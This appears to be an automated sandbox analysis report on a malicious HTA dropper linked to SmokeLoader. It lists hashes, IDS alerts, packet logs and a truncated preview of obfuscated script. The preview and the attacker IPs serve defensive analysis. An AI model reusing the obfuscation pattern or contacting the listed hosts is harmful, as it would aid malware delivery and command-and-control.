Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: MT_BURAAQ_FINAL_DRAFT_BL_RFQ32400909909_PDF.exe, Detection: malicious, Browse Filename: PAYMENT_SWIFT_REFHSBC029999018728929000187928311119281-PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@>.]..............0..d............... ........@.. ...............................h....`.................................D...O.......$............r.. B........................................................... ............... ..H............text....b... ...d.................. ..`.rsrc...$............f..............@..@.reloc...............p..............@..B................x.......H........&..$R...........x..(............................................0..........(.....R.....&..(....(....(..........%.r...p.(....(....(....(....(....(......i.3..(....-.(.....*s.....(....r...p(......s......o ...-+r9..p(....(..........%...(....(............~P...-E.o!...-.rC..p(....(....+.(....(......&rM..p(....(.....................rW..po".....,...-+rk..p(....(..........%...(....(............o#...(....(...............(........-.......u........,$ru..p..o$.....o%.....o&...(

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\wihaduv
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	205
Entropy (8bit):	4.885260249249672
Encrypted:	false
SSDEEP:	6:zx3Me21feILRJIQtAMwNpRRZBXVN+yYHS8D:zKpZ1JIU8TBFN+yEz
MD5:	F0C94232CD52CCB67121C109FDE9C438
SHA1:	78D777E718E0D6C4A1AF1EE3FE0645337670CDD0
SHA-256:	4F1FB7C97BCB6CDC0A23595972F6AE8622D5DAF79F3987137316821B55780894
SHA-512:	DBB94A5B9824F6671213E827FBCA65E7861BC851D9DBC01043491D0BB2DEDE0A98BD95DB7B13978FAF718027728321536A6E0235CB3C43E44F6B8D6E0D565417
Malicious:	false
Preview:	Microsoft (R) ASP.NET Browser Registration Tool version 4.8.4084.0..Utility to compile ASP.Net browser files...Copyright (C) Microsoft Corporation. All rights reserved...aspnet_regbrowsers [-? \| -i \| -u]..

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Entropy (8bit):	2.1521422855138748
TrID:	HTML Application (8008/1) 100.00%
File name:	veryeasythingsevermadeforcreatenewthignsbetterthigns.hta
File size:	133'648 bytes
MD5:	9f1733aa2737250f3e253416eece168d
SHA1:	55f89ea7ec19fd9bad79d119e5e0d2bb5eb86a17
SHA256:	63996411977b3f59cee9b839e79955227b66ef2cf7ddd9ee388ad4fdc5559045
SHA512:	62fbc07b47d01c1d440e2fb4da10e6c7de2de55b40ff877501979bfdd68e09791f9de170a9d6f24dc66b2a2c657eb28e4c44b817ea3a008c89ce1221d504ab52
SSDEEP:	96:Eam7jmsLsms3IRiYbgYVwJ8gV8nmsims5m93msK7T:Ea26enRyYA+8mUrT
TLSH:	D7D33DA6ED391DECF3DC5A9B75FDB2E8311E131BA3192FA1600F7991C89234C60C4126
File Content Preview:	<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%25252

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-23T08:15:00.290944+0200	2049038	ET MALWARE Malicious Base64 Encoded Payload In Image	1	142.250.185.193	443	192.168.2.10	49778	TCP
2024-10-23T08:15:42.990854+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.10	49980	45.91.8.152	80	TCP
2024-10-23T08:15:43.287323+0200	2829848	ETPRO MALWARE SmokeLoader encrypted module (3)	2	45.91.8.152	80	192.168.2.10	49980	TCP
2024-10-23T08:15:48.908087+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.10	49981	45.91.8.152	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 23, 2024 08:14:43.406101942 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:43.411431074 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:43.411597013 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:43.411932945 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:43.417227030 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091351986 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091387987 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091398954 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091429949 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.091449976 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.091475010 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091543913 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091553926 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091566086 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091578007 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091583014 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.091612101 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.091659069 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.091753960 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091764927 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.091816902 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.096703053 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.096745014 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.096776009 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.096817017 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.096894979 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.096935987 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.096962929 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.096976042 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.097002029 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.097032070 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.392052889 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392111063 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.392153025 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392167091 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392177105 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392198086 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392204046 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.392210960 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392224073 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392234087 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392235994 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.392246962 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392257929 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392265081 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.392268896 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392280102 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392290115 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.392303944 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.392338991 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.392357111 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.393858910 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.393903017 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.394691944 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.394740105 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.400201082 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.400213957 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.400224924 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.400237083 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.400255919 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.400262117 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.400269985 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.400280952 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.400326967 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.401422977 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.401540041 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.402112961 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402126074 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402137041 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402149916 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402177095 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.402220011 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.402264118 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402276039 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402287006 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402297974 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.402307034 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.402333975 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.402355909 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.450719118 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.450778961 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.450790882 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.450797081 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.450824022 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.450848103 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.450870037 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.450925112 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.450977087 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451026917 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.451045036 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451057911 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451092005 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.451108932 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.451124907 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451188087 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.451560020 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451649904 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451662064 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451703072 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.451741934 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.451771021 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451781988 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.451818943 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.491292953 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.491372108 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.491403103 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.491415977 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.491461039 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.570534945 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.570557117 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.570606947 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.570622921 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.570662022 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.570667028 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.570673943 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.570702076 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.570717096 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.571014881 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.571053982 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.571064949 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.571067095 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.571095943 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.571114063 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.571425915 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.571490049 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.571496964 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.571508884 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.571537971 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.571552992 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.571574926 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.571734905 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.572010040 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.572074890 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.572844982 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.572963953 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.611227989 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.611303091 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.611320972 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.611346006 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.611370087 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.611401081 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.611426115 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.611510992 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.611557007 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690186977 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690264940 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690291882 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690336943 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690346956 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690391064 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690395117 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690437078 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690468073 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690517902 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690552950 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690565109 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690596104 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690618992 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.690692902 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.690732956 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.691055059 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.691158056 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.691169024 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.691179037 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.691210032 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.691485882 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.691529036 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.691545010 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.691555023 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.691582918 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.691607952 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.730865002 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.730916977 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.730952978 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.730973959 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.730978966 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.731024981 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.731040001 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.731167078 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.731187105 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.731195927 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.731232882 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.810209036 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810225964 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810236931 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810307980 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810317993 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810349941 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.810415030 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.810446024 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810461044 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810472012 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810498953 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.810533047 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.810609102 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.810657978 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.811168909 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.811232090 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.811281919 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.811300993 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.811335087 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.811359882 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.811486006 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.811559916 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.811618090 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.850745916 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.850799084 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.850810051 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.850902081 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.850970984 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.851016045 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.851026058 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.851079941 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.929763079 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.929781914 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.929843903 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.930047989 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930102110 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.930130959 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930143118 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930174112 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.930191994 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.930260897 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930309057 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.930331945 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930346012 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930389881 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.930697918 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930752993 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.930906057 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930917025 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.930953026 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.970571995 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.970638037 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.970644951 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.970650911 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.970681906 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.970757008 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.970771074 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.970783949 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.970803976 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.970809937 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.970827103 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.970851898 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.971158028 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.971210957 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.971223116 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:44.971261024 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:44.971282959 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.049902916 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.049956083 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.049966097 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.049998045 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.050035954 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.050101995 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.050173044 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.050173998 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.050187111 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.050215006 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.050232887 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.050303936 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.050354958 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.050652027 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.050692081 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:45.050770998 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:45.050813913 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:49.140830040 CEST	80	49732	172.245.135.166	192.168.2.10
Oct 23, 2024 08:14:49.140889883 CEST	49732	80	192.168.2.10	172.245.135.166
Oct 23, 2024 08:14:50.381539106 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:50.381581068 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:50.381851912 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:50.391031981 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:50.391047955 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.235874891 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.236058950 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:51.236947060 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.237725973 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:51.240211964 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:51.240223885 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.240447044 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.250080109 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:51.295322895 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.599386930 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.603333950 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:51.603367090 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.603485107 CEST	443	49772	142.250.186.78	192.168.2.10
Oct 23, 2024 08:14:51.603506088 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:51.603576899 CEST	49772	443	192.168.2.10	142.250.186.78
Oct 23, 2024 08:14:51.613939047 CEST	49778	443	192.168.2.10	142.250.185.193
